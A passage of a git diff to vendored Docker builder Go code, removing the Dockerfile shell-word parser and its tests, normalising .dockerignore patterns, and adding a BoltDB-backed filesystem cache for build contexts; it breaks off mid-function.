<= len(line); pos++ { - if pos != len(line) { - ch = rune(line[pos]) - } - - if phase == inSpaces { // Looking for start of word - if pos == len(line) { // end of input - break - } - if unicode.IsSpace(ch) { // skip spaces - continue - } - - // Only keep going if the next word starts with -- - if ch != '-' || pos+1 == len(line) || rune(line[pos+1]) != '-' { - return line[pos:], words, nil - } - - phase = inWord // found someting with "--", fall through - } - if (phase == inWord || phase == inQuote) && (pos == len(line)) { - if word != "--" && (blankOK || len(word) > 0) { - words = append(words, word) - } - break - } - if phase == inWord { - if unicode.IsSpace(ch) { - phase = inSpaces - if word == "--" { - return line[pos:], words, nil - } - if blankOK || len(word) > 0 { - words = append(words, word) - } - word = "" - blankOK = false - continue 
- } - if ch == '\'' || ch == '"' { - quote = ch - blankOK = true - phase = inQuote - continue - } - if ch == '\\' { - if pos+1 == len(line) { - continue // just skip \ at end - } - pos++ - ch = rune(line[pos]) - } - word += string(ch) - continue - } - if phase == inQuote { - if ch == quote { - phase = inWord - continue - } - if ch == '\\' { - if pos+1 == len(line) { - phase = inWord - continue // just skip \ at end - } - pos++ - ch = rune(line[pos]) - } - word += string(ch) - } - } - - return "", words, nil -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go b/vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go deleted file mode 100644 index 189afd1fdb..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go +++ /dev/null @@ -1,329 +0,0 @@ -package dockerfile - -// This will take a single word and an array of env variables and -// process all quotes (" and ') as well as $xxx and ${xxx} env variable -// tokens. Tries to mimic bash shell process. -// It doesn't support all flavors of ${xx:...} formats but new ones can -// be added by adding code to the "special ${} format processing" section - -import ( - "fmt" - "runtime" - "strings" - "text/scanner" - "unicode" -) - -type shellWord struct { - word string - scanner scanner.Scanner - envs []string - pos int - escapeToken rune -} - -// ProcessWord will use the 'env' list of environment variables, -// and replace any env var references in 'word'. 
-func ProcessWord(word string, env []string, escapeToken rune) (string, error) { - sw := &shellWord{ - word: word, - envs: env, - pos: 0, - escapeToken: escapeToken, - } - sw.scanner.Init(strings.NewReader(word)) - word, _, err := sw.process() - return word, err -} - -// ProcessWords will use the 'env' list of environment variables, -// and replace any env var references in 'word' then it will also -// return a slice of strings which represents the 'word' -// split up based on spaces - taking into account quotes. Note that -// this splitting is done **after** the env var substitutions are done. -// Note, each one is trimmed to remove leading and trailing spaces (unless -// they are quoted", but ProcessWord retains spaces between words. -func ProcessWords(word string, env []string, escapeToken rune) ([]string, error) { - sw := &shellWord{ - word: word, - envs: env, - pos: 0, - escapeToken: escapeToken, - } - sw.scanner.Init(strings.NewReader(word)) - _, words, err := sw.process() - return words, err -} - -func (sw *shellWord) process() (string, []string, error) { - return sw.processStopOn(scanner.EOF) -} - -type wordsStruct struct { - word string - words []string - inWord bool -} - -func (w *wordsStruct) addChar(ch rune) { - if unicode.IsSpace(ch) && w.inWord { - if len(w.word) != 0 { - w.words = append(w.words, w.word) - w.word = "" - w.inWord = false - } - } else if !unicode.IsSpace(ch) { - w.addRawChar(ch) - } -} - -func (w *wordsStruct) addRawChar(ch rune) { - w.word += string(ch) - w.inWord = true -} - -func (w *wordsStruct) addString(str string) { - var scan scanner.Scanner - scan.Init(strings.NewReader(str)) - for scan.Peek() != scanner.EOF { - w.addChar(scan.Next()) - } -} - -func (w *wordsStruct) addRawString(str string) { - w.word += str - w.inWord = true -} - -func (w *wordsStruct) getWords() []string { - if len(w.word) > 0 { - w.words = append(w.words, w.word) - - // Just in case we're called again by mistake - w.word = "" - w.inWord = false - } - return 
w.words -} - -// Process the word, starting at 'pos', and stop when we get to the -// end of the word or the 'stopChar' character -func (sw *shellWord) processStopOn(stopChar rune) (string, []string, error) { - var result string - var words wordsStruct - - var charFuncMapping = map[rune]func() (string, error){ - '\'': sw.processSingleQuote, - '"': sw.processDoubleQuote, - '$': sw.processDollar, - } - - for sw.scanner.Peek() != scanner.EOF { - ch := sw.scanner.Peek() - - if stopChar != scanner.EOF && ch == stopChar { - sw.scanner.Next() - break - } - if fn, ok := charFuncMapping[ch]; ok { - // Call special processing func for certain chars - tmp, err := fn() - if err != nil { - return "", []string{}, err - } - result += tmp - - if ch == rune('$') { - words.addString(tmp) - } else { - words.addRawString(tmp) - } - } else { - // Not special, just add it to the result - ch = sw.scanner.Next() - - if ch == sw.escapeToken { - // '\' (default escape token, but ` allowed) escapes, except end of line - - ch = sw.scanner.Next() - - if ch == scanner.EOF { - break - } - - words.addRawChar(ch) - } else { - words.addChar(ch) - } - - result += string(ch) - } - } - - return result, words.getWords(), nil -} - -func (sw *shellWord) processSingleQuote() (string, error) { - // All chars between single quotes are taken as-is - // Note, you can't escape ' - var result string - - sw.scanner.Next() - - for { - ch := sw.scanner.Next() - if ch == '\'' || ch == scanner.EOF { - break - } - result += string(ch) - } - - return result, nil -} - -func (sw *shellWord) processDoubleQuote() (string, error) { - // All chars up to the next " are taken as-is, even ', except any $ chars - // But you can escape " with a \ (or ` if escape token set accordingly) - var result string - - sw.scanner.Next() - - for sw.scanner.Peek() != scanner.EOF { - ch := sw.scanner.Peek() - if ch == '"' { - sw.scanner.Next() - break - } - if ch == '$' { - tmp, err := sw.processDollar() - if err != nil { - return "", err - } 
- result += tmp - } else { - ch = sw.scanner.Next() - if ch == sw.escapeToken { - chNext := sw.scanner.Peek() - - if chNext == scanner.EOF { - // Ignore \ at end of word - continue - } - - if chNext == '"' || chNext == '$' { - // \" and \$ can be escaped, all other \'s are left as-is - ch = sw.scanner.Next() - } - } - result += string(ch) - } - } - - return result, nil -} - -func (sw *shellWord) processDollar() (string, error) { - sw.scanner.Next() - ch := sw.scanner.Peek() - if ch == '{' { - sw.scanner.Next() - name := sw.processName() - ch = sw.scanner.Peek() - if ch == '}' { - // Normal ${xx} case - sw.scanner.Next() - return sw.getEnv(name), nil - } - if ch == ':' { - // Special ${xx:...} format processing - // Yes it allows for recursive $'s in the ... spot - - sw.scanner.Next() // skip over : - modifier := sw.scanner.Next() - - word, _, err := sw.processStopOn('}') - if err != nil { - return "", err - } - - // Grab the current value of the variable in question so we - // can use to to determine what to do based on the modifier - newValue := sw.getEnv(name) - - switch modifier { - case '+': - if newValue != "" { - newValue = word - } - return newValue, nil - - case '-': - if newValue == "" { - newValue = word - } - return newValue, nil - - default: - return "", fmt.Errorf("Unsupported modifier (%c) in substitution: %s", modifier, sw.word) - } - } - return "", fmt.Errorf("Missing ':' in substitution: %s", sw.word) - } - // $xxx case - name := sw.processName() - if name == "" { - return "$", nil - } - return sw.getEnv(name), nil -} - -func (sw *shellWord) processName() string { - // Read in a name (alphanumeric or _) - // If it starts with a numeric then just return $# - var name string - - for sw.scanner.Peek() != scanner.EOF { - ch := sw.scanner.Peek() - if len(name) == 0 && unicode.IsDigit(ch) { - ch = sw.scanner.Next() - return string(ch) - } - if !unicode.IsLetter(ch) && !unicode.IsDigit(ch) && ch != '_' { - break - } - ch = sw.scanner.Next() - name += 
string(ch) - } - - return name -} - -func (sw *shellWord) getEnv(name string) string { - if runtime.GOOS == "windows" { - // Case-insensitive environment variables on Windows - name = strings.ToUpper(name) - } - for _, env := range sw.envs { - i := strings.Index(env, "=") - if i < 0 { - if runtime.GOOS == "windows" { - env = strings.ToUpper(env) - } - if name == env { - // Should probably never get here, but just in case treat - // it like "var" and "var=" are the same - return "" - } - continue - } - compareName := env[:i] - if runtime.GOOS == "windows" { - compareName = strings.ToUpper(compareName) - } - if name != compareName { - continue - } - return env[i+1:] - } - return "" -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go b/vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go deleted file mode 100644 index 6cf691c077..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go +++ /dev/null @@ -1,155 +0,0 @@ -package dockerfile - -import ( - "bufio" - "os" - "runtime" - "strings" - "testing" -) - -func TestShellParser4EnvVars(t *testing.T) { - fn := "envVarTest" - lineCount := 0 - - file, err := os.Open(fn) - if err != nil { - t.Fatalf("Can't open '%s': %s", err, fn) - } - defer file.Close() - - scanner := bufio.NewScanner(file) - envs := []string{"PWD=/home", "SHELL=bash", "KOREAN=한국어"} - for scanner.Scan() { - line := scanner.Text() - lineCount++ - - // Trim comments and blank lines - i := strings.Index(line, "#") - if i >= 0 { - line = line[:i] - } - line = strings.TrimSpace(line) - - if line == "" { - continue - } - - words := strings.Split(line, "|") - if len(words) != 3 { - t.Fatalf("Error in '%s' - should be exactly one | in:%q", fn, line) - } - - words[0] = strings.TrimSpace(words[0]) - words[1] = strings.TrimSpace(words[1]) - words[2] = strings.TrimSpace(words[2]) - - // Key W=Windows; A=All; U=Unix - if (words[0] != "W") && (words[0] != "A") && (words[0] != "U") { 
- t.Fatalf("Invalid tag %s at line %d of %s. Must be W, A or U", words[0], lineCount, fn) - } - - if ((words[0] == "W" || words[0] == "A") && runtime.GOOS == "windows") || - ((words[0] == "U" || words[0] == "A") && runtime.GOOS != "windows") { - newWord, err := ProcessWord(words[1], envs, '\\') - - if err != nil { - newWord = "error" - } - - if newWord != words[2] { - t.Fatalf("Error. Src: %s Calc: %s Expected: %s at line %d", words[1], newWord, words[2], lineCount) - } - } - } -} - -func TestShellParser4Words(t *testing.T) { - fn := "wordsTest" - - file, err := os.Open(fn) - if err != nil { - t.Fatalf("Can't open '%s': %s", err, fn) - } - defer file.Close() - - envs := []string{} - scanner := bufio.NewScanner(file) - for scanner.Scan() { - line := scanner.Text() - - if strings.HasPrefix(line, "#") { - continue - } - - if strings.HasPrefix(line, "ENV ") { - line = strings.TrimLeft(line[3:], " ") - envs = append(envs, line) - continue - } - - words := strings.Split(line, "|") - if len(words) != 2 { - t.Fatalf("Error in '%s' - should be exactly one | in: %q", fn, line) - } - test := strings.TrimSpace(words[0]) - expected := strings.Split(strings.TrimLeft(words[1], " "), ",") - - result, err := ProcessWords(test, envs, '\\') - - if err != nil { - result = []string{"error"} - } - - if len(result) != len(expected) { - t.Fatalf("Error. %q was suppose to result in %q, but got %q instead", test, expected, result) - } - for i, w := range expected { - if w != result[i] { - t.Fatalf("Error. 
%q was suppose to result in %q, but got %q instead", test, expected, result) - } - } - } -} - -func TestGetEnv(t *testing.T) { - sw := &shellWord{ - word: "", - envs: nil, - pos: 0, - } - - sw.envs = []string{} - if sw.getEnv("foo") != "" { - t.Fatalf("2 - 'foo' should map to ''") - } - - sw.envs = []string{"foo"} - if sw.getEnv("foo") != "" { - t.Fatalf("3 - 'foo' should map to ''") - } - - sw.envs = []string{"foo="} - if sw.getEnv("foo") != "" { - t.Fatalf("4 - 'foo' should map to ''") - } - - sw.envs = []string{"foo=bar"} - if sw.getEnv("foo") != "bar" { - t.Fatalf("5 - 'foo' should map to 'bar'") - } - - sw.envs = []string{"foo=bar", "car=hat"} - if sw.getEnv("foo") != "bar" { - t.Fatalf("6 - 'foo' should map to 'bar'") - } - if sw.getEnv("car") != "hat" { - t.Fatalf("7 - 'car' should map to 'hat'") - } - - // Make sure we grab the first 'car' in the list - sw.envs = []string{"foo=bar", "car=hat", "car=bike"} - if sw.getEnv("car") != "hat" { - t.Fatalf("8 - 'car' should map to 'hat'") - } -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/support.go b/vendor/github.com/docker/docker/builder/dockerfile/support.go deleted file mode 100644 index e87588910b..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/support.go +++ /dev/null @@ -1,19 +0,0 @@ -package dockerfile - -import "strings" - -// handleJSONArgs parses command passed to CMD, ENTRYPOINT, RUN and SHELL instruction in Dockerfile -// for exec form it returns untouched args slice -// for shell form it returns concatenated args as the first element of a slice -func handleJSONArgs(args []string, attributes map[string]bool) []string { - if len(args) == 0 { - return []string{} - } - - if attributes != nil && attributes["json"] { - return args - } - - // literal string command, not an exec array - return []string{strings.Join(args, " ")} -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/support_test.go 
b/vendor/github.com/docker/docker/builder/dockerfile/support_test.go deleted file mode 100644 index 7cc6fe9dcb..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/support_test.go +++ /dev/null @@ -1,65 +0,0 @@ -package dockerfile - -import "testing" - -type testCase struct { - name string - args []string - attributes map[string]bool - expected []string -} - -func initTestCases() []testCase { - testCases := []testCase{} - - testCases = append(testCases, testCase{ - name: "empty args", - args: []string{}, - attributes: make(map[string]bool), - expected: []string{}, - }) - - jsonAttributes := make(map[string]bool) - jsonAttributes["json"] = true - - testCases = append(testCases, testCase{ - name: "json attribute with one element", - args: []string{"foo"}, - attributes: jsonAttributes, - expected: []string{"foo"}, - }) - - testCases = append(testCases, testCase{ - name: "json attribute with two elements", - args: []string{"foo", "bar"}, - attributes: jsonAttributes, - expected: []string{"foo", "bar"}, - }) - - testCases = append(testCases, testCase{ - name: "no attributes", - args: []string{"foo", "bar"}, - attributes: nil, - expected: []string{"foo bar"}, - }) - - return testCases -} - -func TestHandleJSONArgs(t *testing.T) { - testCases := initTestCases() - - for _, test := range testCases { - arguments := handleJSONArgs(test.args, test.attributes) - - if len(arguments) != len(test.expected) { - t.Fatalf("In test \"%s\": length of returned slice is incorrect. Expected: %d, got: %d", test.name, len(test.expected), len(arguments)) - } - - for i := range test.expected { - if arguments[i] != test.expected[i] { - t.Fatalf("In test \"%s\": element as position %d is incorrect. 
Expected: %s, got: %s", test.name, i, test.expected[i], arguments[i]) - } - } - } -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go b/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go index 80a3f1babf..3d615f3460 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go @@ -1,4 +1,4 @@ -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/builder/dockerfile/wordsTest b/vendor/github.com/docker/docker/builder/dockerfile/wordsTest deleted file mode 100644 index fa916c67f9..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/wordsTest +++ /dev/null @@ -1,25 +0,0 @@ -hello | hello -hello${hi}bye | hellobye -ENV hi=hi -hello${hi}bye | hellohibye -ENV space=abc def -hello${space}bye | helloabc,defbye -hello"${space}"bye | helloabc defbye -hello "${space}"bye | hello,abc defbye -ENV leading= ab c -hello${leading}def | hello,ab,cdef -hello"${leading}" def | hello ab c,def -hello"${leading}" | hello ab c -hello${leading} | hello,ab,c -# next line MUST have 3 trailing spaces, don't erase them! -ENV trailing=ab c -hello${trailing} | helloab,c -hello${trailing}d | helloab,c,d -hello"${trailing}"d | helloab c d -# next line MUST have 3 trailing spaces, don't erase them! 
-hel"lo${trailing}" | helloab c -hello" there " | hello there -hello there | hello,there -hello\ there | hello there -hello" there | hello there -hello\" there | hello",there diff --git a/vendor/github.com/docker/docker/builder/dockerignore.go b/vendor/github.com/docker/docker/builder/dockerignore.go deleted file mode 100644 index 3da7913367..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerignore.go +++ /dev/null @@ -1,48 +0,0 @@ -package builder - -import ( - "os" - - "github.com/docker/docker/builder/dockerignore" - "github.com/docker/docker/pkg/fileutils" -) - -// DockerIgnoreContext wraps a ModifiableContext to add a method -// for handling the .dockerignore file at the root of the context. -type DockerIgnoreContext struct { - ModifiableContext -} - -// Process reads the .dockerignore file at the root of the embedded context. -// If .dockerignore does not exist in the context, then nil is returned. -// -// It can take a list of files to be removed after .dockerignore is removed. -// This is used for server-side implementations of builders that need to send -// the .dockerignore file as well as the special files specified in filesToRemove, -// but expect them to be excluded from the context after they were processed. -// -// For example, server-side Dockerfile builders are expected to pass in the name -// of the Dockerfile to be removed after it was parsed. -// -// TODO: Don't require a ModifiableContext (use Context instead) and don't remove -// files, instead handle a list of files to be excluded from the context. -func (c DockerIgnoreContext) Process(filesToRemove []string) error { - f, err := c.Open(".dockerignore") - // Note that a missing .dockerignore file isn't treated as an error - if err != nil { - if os.IsNotExist(err) { - return nil - } - return err - } - excludes, _ := dockerignore.ReadAll(f) - f.Close() - filesToRemove = append([]string{".dockerignore"}, filesToRemove...) 
- for _, fileToRemove := range filesToRemove { - rm, _ := fileutils.Matches(fileToRemove, excludes) - if rm { - c.Remove(fileToRemove) - } - } - return nil -} diff --git a/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go index 2db67be799..57f224afc8 100644 --- a/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go +++ b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go @@ -1,4 +1,4 @@ -package dockerignore +package dockerignore // import "github.com/docker/docker/builder/dockerignore" import ( "bufio" @@ -38,8 +38,23 @@ func ReadAll(reader io.Reader) ([]string, error) { if pattern == "" { continue } - pattern = filepath.Clean(pattern) - pattern = filepath.ToSlash(pattern) + // normalize absolute paths to paths relative to the context + // (taking care of '!' prefix) + invert := pattern[0] == '!' + if invert { + pattern = strings.TrimSpace(pattern[1:]) + } + if len(pattern) > 0 { + pattern = filepath.Clean(pattern) + pattern = filepath.ToSlash(pattern) + if len(pattern) > 1 && pattern[0] == '/' { + pattern = pattern[1:] + } + } + if invert { + pattern = "!" 
+ pattern + } + excludes = append(excludes, pattern) } if err := scanner.Err(); err != nil { diff --git a/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go index 612a1399cd..06186cc120 100644 --- a/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go +++ b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go @@ -1,4 +1,4 @@ -package dockerignore +package dockerignore // import "github.com/docker/docker/builder/dockerignore" import ( "fmt" @@ -25,7 +25,7 @@ func TestReadAll(t *testing.T) { } diName := filepath.Join(tmpDir, ".dockerignore") - content := fmt.Sprintf("test1\n/test2\n/a/file/here\n\nlastfile") + content := fmt.Sprintf("test1\n/test2\n/a/file/here\n\nlastfile\n# this is a comment\n! /inverted/abs/path\n!\n! \n") err = ioutil.WriteFile(diName, []byte(content), 0777) if err != nil { t.Fatal(err) @@ -42,16 +42,28 @@ func TestReadAll(t *testing.T) { t.Fatal(err) } + if len(di) != 7 { + t.Fatalf("Expected 5 entries, got %v", len(di)) + } if di[0] != "test1" { - t.Fatalf("First element is not test1") + t.Fatal("First element is not test1") } - if di[1] != "/test2" { - t.Fatalf("Second element is not /test2") + if di[1] != "test2" { // according to https://docs.docker.com/engine/reference/builder/#dockerignore-file, /foo/bar should be treated as foo/bar + t.Fatal("Second element is not test2") } - if di[2] != "/a/file/here" { - t.Fatalf("Third element is not /a/file/here") + if di[2] != "a/file/here" { // according to https://docs.docker.com/engine/reference/builder/#dockerignore-file, /foo/bar should be treated as foo/bar + t.Fatal("Third element is not a/file/here") } if di[3] != "lastfile" { - t.Fatalf("Fourth element is not lastfile") + t.Fatal("Fourth element is not lastfile") + } + if di[4] != "!inverted/abs/path" { + t.Fatal("Fifth element is not !inverted/abs/path") + } + if di[5] != "!" 
{ + t.Fatalf("Sixth element is not !, but %s", di[5]) + } + if di[6] != "!" { + t.Fatalf("Sixth element is not !, but %s", di[6]) } } diff --git a/vendor/github.com/docker/docker/builder/fscache/fscache.go b/vendor/github.com/docker/docker/builder/fscache/fscache.go new file mode 100644 index 0000000000..92c3ea4adb --- /dev/null +++ b/vendor/github.com/docker/docker/builder/fscache/fscache.go @@ -0,0 +1,652 @@ +package fscache // import "github.com/docker/docker/builder/fscache" + +import ( + "archive/tar" + "context" + "crypto/sha256" + "encoding/json" + "hash" + "os" + "path/filepath" + "sort" + "sync" + "time" + + "github.com/boltdb/bolt" + "github.com/docker/docker/builder" + "github.com/docker/docker/builder/remotecontext" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/directory" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/tarsum" + "github.com/moby/buildkit/session/filesync" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "github.com/tonistiigi/fsutil" + "golang.org/x/sync/singleflight" +) + +const dbFile = "fscache.db" +const cacheKey = "cache" +const metaKey = "meta" + +// Backend is a backing implementation for FSCache +type Backend interface { + Get(id string) (string, error) + Remove(id string) error +} + +// FSCache allows syncing remote resources to cached snapshots +type FSCache struct { + opt Opt + transports map[string]Transport + mu sync.Mutex + g singleflight.Group + store *fsCacheStore +} + +// Opt defines options for initializing FSCache +type Opt struct { + Backend Backend + Root string // for storing local metadata + GCPolicy GCPolicy +} + +// GCPolicy defines policy for garbage collection +type GCPolicy struct { + MaxSize uint64 + MaxKeepDuration time.Duration +} + +// NewFSCache returns new FSCache object +func NewFSCache(opt Opt) (*FSCache, error) { + store, err := newFSCacheStore(opt) + if err != nil { + return nil, err + } + return &FSCache{ + store: store, + opt: opt, + 
transports: make(map[string]Transport), + }, nil +} + +// Transport defines a method for syncing remote data to FSCache +type Transport interface { + Copy(ctx context.Context, id RemoteIdentifier, dest string, cs filesync.CacheUpdater) error +} + +// RemoteIdentifier identifies a transfer request +type RemoteIdentifier interface { + Key() string + SharedKey() string + Transport() string +} + +// RegisterTransport registers a new transport method +func (fsc *FSCache) RegisterTransport(id string, transport Transport) error { + fsc.mu.Lock() + defer fsc.mu.Unlock() + if _, ok := fsc.transports[id]; ok { + return errors.Errorf("transport %v already exists", id) + } + fsc.transports[id] = transport + return nil +} + +// SyncFrom returns a source based on a remote identifier +func (fsc *FSCache) SyncFrom(ctx context.Context, id RemoteIdentifier) (builder.Source, error) { // cacheOpt + trasportID := id.Transport() + fsc.mu.Lock() + transport, ok := fsc.transports[id.Transport()] + if !ok { + fsc.mu.Unlock() + return nil, errors.Errorf("invalid transport %s", trasportID) + } + + logrus.Debugf("SyncFrom %s %s", id.Key(), id.SharedKey()) + fsc.mu.Unlock() + sourceRef, err, _ := fsc.g.Do(id.Key(), func() (interface{}, error) { + var sourceRef *cachedSourceRef + sourceRef, err := fsc.store.Get(id.Key()) + if err == nil { + return sourceRef, nil + } + + // check for unused shared cache + sharedKey := id.SharedKey() + if sharedKey != "" { + r, err := fsc.store.Rebase(sharedKey, id.Key()) + if err == nil { + sourceRef = r + } + } + + if sourceRef == nil { + var err error + sourceRef, err = fsc.store.New(id.Key(), sharedKey) + if err != nil { + return nil, errors.Wrap(err, "failed to create remote context") + } + } + + if err := syncFrom(ctx, sourceRef, transport, id); err != nil { + sourceRef.Release() + return nil, err + } + if err := sourceRef.resetSize(-1); err != nil { + return nil, err + } + return sourceRef, nil + }) + if err != nil { + return nil, err + } + ref := 
sourceRef.(*cachedSourceRef) + if ref.src == nil { // failsafe + return nil, errors.Errorf("invalid empty pull") + } + wc := &wrappedContext{Source: ref.src, closer: func() error { + ref.Release() + return nil + }} + return wc, nil +} + +// DiskUsage reports how much data is allocated by the cache +func (fsc *FSCache) DiskUsage(ctx context.Context) (int64, error) { + return fsc.store.DiskUsage(ctx) +} + +// Prune allows manually cleaning up the cache +func (fsc *FSCache) Prune(ctx context.Context) (uint64, error) { + return fsc.store.Prune(ctx) +} + +// Close stops the gc and closes the persistent db +func (fsc *FSCache) Close() error { + return fsc.store.Close() +} + +func syncFrom(ctx context.Context, cs *cachedSourceRef, transport Transport, id RemoteIdentifier) (retErr error) { + src := cs.src + if src == nil { + src = remotecontext.NewCachableSource(cs.Dir()) + } + + if !cs.cached { + if err := cs.storage.db.View(func(tx *bolt.Tx) error { + b := tx.Bucket([]byte(id.Key())) + dt := b.Get([]byte(cacheKey)) + if dt != nil { + if err := src.UnmarshalBinary(dt); err != nil { + return err + } + } else { + return errors.Wrap(src.Scan(), "failed to scan cache records") + } + return nil + }); err != nil { + return err + } + } + + dc := &detectChanges{f: src.HandleChange} + + // todo: probably send a bucket to `Copy` and let it return source + // but need to make sure that tx is safe + if err := transport.Copy(ctx, id, cs.Dir(), dc); err != nil { + return errors.Wrapf(err, "failed to copy to %s", cs.Dir()) + } + + if !dc.supported { + if err := src.Scan(); err != nil { + return errors.Wrap(err, "failed to scan cache records after transfer") + } + } + cs.cached = true + cs.src = src + return cs.storage.db.Update(func(tx *bolt.Tx) error { + dt, err := src.MarshalBinary() + if err != nil { + return err + } + b := tx.Bucket([]byte(id.Key())) + return b.Put([]byte(cacheKey), dt) + }) +} + +type fsCacheStore struct { + mu sync.Mutex + sources map[string]*cachedSource + db 
*bolt.DB + fs Backend + gcTimer *time.Timer + gcPolicy GCPolicy +} + +// CachePolicy defines policy for keeping a resource in cache +type CachePolicy struct { + Priority int + LastUsed time.Time +} + +func defaultCachePolicy() CachePolicy { + return CachePolicy{Priority: 10, LastUsed: time.Now()} +} + +func newFSCacheStore(opt Opt) (*fsCacheStore, error) { + if err := os.MkdirAll(opt.Root, 0700); err != nil { + return nil, err + } + p := filepath.Join(opt.Root, dbFile) + db, err := bolt.Open(p, 0600, nil) + if err != nil { + return nil, errors.Wrap(err, "failed to open database file %s") + } + s := &fsCacheStore{db: db, sources: make(map[string]*cachedSource), fs: opt.Backend, gcPolicy: opt.GCPolicy} + db.View(func(tx *bolt.Tx) error { + return tx.ForEach(func(name []byte, b *bolt.Bucket) error { + dt := b.Get([]byte(metaKey)) + if dt == nil { + return nil + } + var sm sourceMeta + if err := json.Unmarshal(dt, &sm); err != nil { + return err + } + dir, err := s.fs.Get(sm.BackendID) + if err != nil { + return err // TODO: handle gracefully + } + source := &cachedSource{ + refs: make(map[*cachedSourceRef]struct{}), + id: string(name), + dir: dir, + sourceMeta: sm, + storage: s, + } + s.sources[string(name)] = source + return nil + }) + }) + + s.gcTimer = s.startPeriodicGC(5 * time.Minute) + return s, nil +} + +func (s *fsCacheStore) startPeriodicGC(interval time.Duration) *time.Timer { + var t *time.Timer + t = time.AfterFunc(interval, func() { + if err := s.GC(); err != nil { + logrus.Errorf("build gc error: %v", err) + } + t.Reset(interval) + }) + return t +} + +func (s *fsCacheStore) Close() error { + s.gcTimer.Stop() + return s.db.Close() +} + +func (s *fsCacheStore) New(id, sharedKey string) (*cachedSourceRef, error) { + s.mu.Lock() + defer s.mu.Unlock() + var ret *cachedSource + if err := s.db.Update(func(tx *bolt.Tx) error { + b, err := tx.CreateBucket([]byte(id)) + if err != nil { + return err + } + backendID := stringid.GenerateRandomID() + dir, err := 
s.fs.Get(backendID) + if err != nil { + return err + } + source := &cachedSource{ + refs: make(map[*cachedSourceRef]struct{}), + id: id, + dir: dir, + sourceMeta: sourceMeta{ + BackendID: backendID, + SharedKey: sharedKey, + CachePolicy: defaultCachePolicy(), + }, + storage: s, + } + dt, err := json.Marshal(source.sourceMeta) + if err != nil { + return err + } + if err := b.Put([]byte(metaKey), dt); err != nil { + return err + } + s.sources[id] = source + ret = source + return nil + }); err != nil { + return nil, err + } + return ret.getRef(), nil +} + +func (s *fsCacheStore) Rebase(sharedKey, newid string) (*cachedSourceRef, error) { + s.mu.Lock() + defer s.mu.Unlock() + var ret *cachedSource + for id, snap := range s.sources { + if snap.SharedKey == sharedKey && len(snap.refs) == 0 { + if err := s.db.Update(func(tx *bolt.Tx) error { + if err := tx.DeleteBucket([]byte(id)); err != nil { + return err + } + b, err := tx.CreateBucket([]byte(newid)) + if err != nil { + return err + } + snap.id = newid + snap.CachePolicy = defaultCachePolicy() + dt, err := json.Marshal(snap.sourceMeta) + if err != nil { + return err + } + if err := b.Put([]byte(metaKey), dt); err != nil { + return err + } + delete(s.sources, id) + s.sources[newid] = snap + return nil + }); err != nil { + return nil, err + } + ret = snap + break + } + } + if ret == nil { + return nil, errors.Errorf("no candidate for rebase") + } + return ret.getRef(), nil +} + +func (s *fsCacheStore) Get(id string) (*cachedSourceRef, error) { + s.mu.Lock() + defer s.mu.Unlock() + src, ok := s.sources[id] + if !ok { + return nil, errors.Errorf("not found") + } + return src.getRef(), nil +} + +// DiskUsage reports how much data is allocated by the cache +func (s *fsCacheStore) DiskUsage(ctx context.Context) (int64, error) { + s.mu.Lock() + defer s.mu.Unlock() + var size int64 + + for _, snap := range s.sources { + if len(snap.refs) == 0 { + ss, err := snap.getSize(ctx) + if err != nil { + return 0, err + } + size += ss + 
} + } + return size, nil +} + +// Prune allows manually cleaning up the cache +func (s *fsCacheStore) Prune(ctx context.Context) (uint64, error) { + s.mu.Lock() + defer s.mu.Unlock() + var size uint64 + + for id, snap := range s.sources { + select { + case <-ctx.Done(): + logrus.Debugf("Cache prune operation cancelled, pruned size: %d", size) + // when the context is cancelled, only return current size and nil + return size, nil + default: + } + if len(snap.refs) == 0 { + ss, err := snap.getSize(ctx) + if err != nil { + return size, err + } + if err := s.delete(id); err != nil { + return size, errors.Wrapf(err, "failed to delete %s", id) + } + size += uint64(ss) + } + } + return size, nil +} + +// GC runs a garbage collector on FSCache +func (s *fsCacheStore) GC() error { + s.mu.Lock() + defer s.mu.Unlock() + var size uint64 + + ctx := context.Background() + cutoff := time.Now().Add(-s.gcPolicy.MaxKeepDuration) + var blacklist []*cachedSource + + for id, snap := range s.sources { + if len(snap.refs) == 0 { + if cutoff.After(snap.CachePolicy.LastUsed) { + if err := s.delete(id); err != nil { + return errors.Wrapf(err, "failed to delete %s", id) + } + } else { + ss, err := snap.getSize(ctx) + if err != nil { + return err + } + size += uint64(ss) + blacklist = append(blacklist, snap) + } + } + } + + sort.Sort(sortableCacheSources(blacklist)) + for _, snap := range blacklist { + if size <= s.gcPolicy.MaxSize { + break + } + ss, err := snap.getSize(ctx) + if err != nil { + return err + } + if err := s.delete(snap.id); err != nil { + return errors.Wrapf(err, "failed to delete %s", snap.id) + } + size -= uint64(ss) + } + return nil +} + +// keep mu while calling this +func (s *fsCacheStore) delete(id string) error { + src, ok := s.sources[id] + if !ok { + return nil + } + if 